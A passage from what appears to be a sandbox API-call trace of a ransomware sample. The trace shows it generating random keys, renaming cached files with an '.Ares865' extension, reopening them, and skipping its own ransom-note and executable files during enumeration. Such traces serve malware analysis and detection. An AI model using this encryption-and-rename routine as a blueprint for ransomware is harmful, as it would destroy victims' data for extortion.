halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.ares865"), dwFlags=0x1) returned 1 [0110.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.483] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.483] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.488] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.489] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.489] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865") returned 155 [0110.489] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.ares865"), dwFlags=0x1) returned 1 [0110.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.491] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.492] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.492] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.495] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.495] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.495] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.496] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865") returned 155 [0110.496] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.ares865"), dwFlags=0x1) returned 1 [0110.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.498] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.498] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.499] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.499] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.501] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.502] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.502] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865") returned 155 [0110.502] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.ares865"), dwFlags=0x1) returned 1 [0110.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.504] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.508] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865") returned 155 [0110.509] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.ares865"), dwFlags=0x1) returned 1 [0110.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.510] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.511] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.514] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.514] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.514] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.515] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865") returned 155 [0110.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.ares865"), dwFlags=0x1) returned 1 [0110.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.519] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.519] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.520] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.520] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.523] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.524] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.524] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.525] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865") returned 155 [0110.525] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.ares865"), dwFlags=0x1) returned 1 [0110.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.526] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1390) returned 1 [0110.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.527] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.527] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.527] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.530] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.530] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.530] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865") returned 155 [0110.531] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.ares865"), dwFlags=0x1) returned 1 [0110.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.533] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.533] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.534] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.534] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.536] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.536] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.537] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865") returned 155 [0110.537] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.ares865"), dwFlags=0x1) returned 1 [0110.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.539] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.550] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.551] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.551] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0110.553] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0110.553] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.553] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="aoldtz.exe") returned -1 [0110.553] lstrcpyW (in: lpString1=0x2cce4a4, 